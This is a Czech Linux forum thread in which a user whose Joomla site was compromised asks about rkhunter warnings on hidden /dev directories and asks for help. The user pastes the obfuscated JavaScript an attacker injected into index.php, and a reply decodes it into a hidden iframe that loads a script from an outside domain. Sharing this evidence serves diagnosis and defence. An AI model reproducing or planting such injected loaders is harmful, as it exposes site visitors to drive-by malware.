Prosíme přihlašte se nebo zaregistrujte.

Přihlašte se svým uživatelským jménem a heslem.
Vaše pomoc je stále potřeba!

Autor Téma: Rootkit Hunter Warning  (Přečteno 1781 krát)

kejml

  • Návštěvník
  • Příspěvků: 60
Rootkit Hunter Warning
« kdy: 27 Dubna 2009, 11:33:23 »
Zdar ve spolek,

před pár dny se mi někdo dostal zřejmě přes Joomlu do mašiny (Ubuntu 8.04 Hardy) a na jeden web přidal nějaké skripty, které
se připojovaly na nějaké stránky na netu zřejmě kvůli zpětným odkazům apod. Problém jsem vyřešil, ale pro
jistotu jsem si nainstaloval rootkithunter (sudo apt-get install rkhunter), což se mi jeví jako velice solidní nástroj na kontrolu rootkitů apod.

Rootkithunter mě upozornil na následující skryté adresáře :

[10:55:57]   Checking for hidden files and directories       [ Warning ]
[10:55:57] Warning: Hidden directory found: /dev/.static
[10:55:57] Warning: Hidden directory found: /dev/.udev
[10:55:57] Warning: Hidden directory found: /dev/.initramfs

Nevíte někdo, prosím vás, jestli to může být nějaký potenciální problém a nebo se jedná o nějaké standartní skryté adresáře,
které jsou v systému normálně ? Pátral jsem trošku po tom initramfs a mám z toho krapet obavy, ale chytrý z toho  moc nejsem
a netuším, jestli je to součástí systému a k něčemu se to používá nebo ne ...

Zkoušel jsem to projet tím rkhunterem i na druhé mašině, kde mám čistou instalaci a tam nic takového nemám ...
Sotva jsem ten web obnovil ze zálohy, na druhý den jsem ho měl upravený tím skriptem znovu a při pokusu otevřít
ty stránky mě varoval Google že se jedná o potenciálně nebezpečné stránky a trvalo cca. 3 dny, než mi to robot navštívil znovu
a před nebezpečností stránek už nevaruje ... Každá rada dobrá, protože v téhle tématice se ještě moc neorientuju ...

Edit : Nevím jestli by to mohlo nějak pomoct, ale na úvodní stránce webu (index.php) se mi objevuje tenhle kód :

<script>function v49f579ed33de6(v49f579ed341ce){  return(parseInt(v49f579ed341ce
,16));}function v49f579ed34d85(v49f579ed3516f){  var v49f579ed35559='';for(v49f5
79ed3593e=0; v49f579ed3593e<v49f579ed3516f.length; v49f579ed3593e+=2){ v49f579ed
35559+=(String.fromCharCode(v49f579ed33de6(v49f579ed3516f.substr(v49f579ed3593e,
 2))));}return v49f579ed35559;} document.write(v49f579ed34d85('3C696672616D65206
E616D653D273527207372633D27687474703A2F2F746F74616C7765696768746C6F737363656E746
5722E636F6D2F696D616765732F676F2E7068703F7369643D31272077696474683D3139322068656
96768743D323737207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'))
;</script>

« Poslední změna: 27 Dubna 2009, 12:26:34 od kejml »

airlive

  • Závislák
  • ***
  • Příspěvků: 2280
  • Linux User: 479151.
openSUSE Leap 15.1
Vivaldi: King of Browsers.
"Tón, kterým se hovoří v linuxových skupinách, je tvrdý, ale srdečný..."

kejml

  • Návštěvník
  • Příspěvků: 60
Re: Rootkit Hunter Warning
« Odpověď #2 kdy: 27 Dubna 2009, 13:26:21 »
Nevím jestli to pomůže,ale mrkni sem:
http://forum.kubuntu.sk/viewtopic.php?id=2044
http://sourceforge.net/docman/display_doc.php?docid=35179&group_id=155034


Díky moc za tip ! Už jsem to prostudoval ... podle toho fóra kubuntu.sk by to neměl být problém ...
Chápu, že jde jen o upozornění na skryté adresáře, ale trošku mě vystrašil ten adresář .initramfs ...
Googloval jsem kolem toho a vypadá to, že je to něco, co umí vytvořit RAM disk apod. a tak mě
napadlo, jestli to není právě spojeno nějak s tím napadením ... Když totiž ručně odstraním ten
kód ze stránek pryč, za půl hodiny se mi to tam objevilo znovu ...

soudruh

  • Aktivní člen
  • *
  • Příspěvků: 458
  • Na Linuxu se stále učím...
Re: Rootkit Hunter Warning
« Odpověď #3 kdy: 12 Května 2009, 21:22:26 »
Script má v sobě "zašifrováno"
Citace
<iframe name='5' src='http://totalweightlosscenter.com/images/go.php?sid=1' width=192 height=277 style='display:none'></iframe>
Takže bych to tipoval na jeden z těch virů co se šíří pomocí kouzelné kombinace: nezaplátovaný XP, Internet Explorer a Total Commander s uloženými hesly na FTP.
Xubuntu 12.10@fermium; Ubuntu 12.04@mandelevium; Android 2.3.3@nobellum; Ubuntu 9.04@lawrencium; FreeNAS@rutherfordium; Xubuntu 12.04@dubnium

 

Provoz zaštiťuje spolek OpenAlt.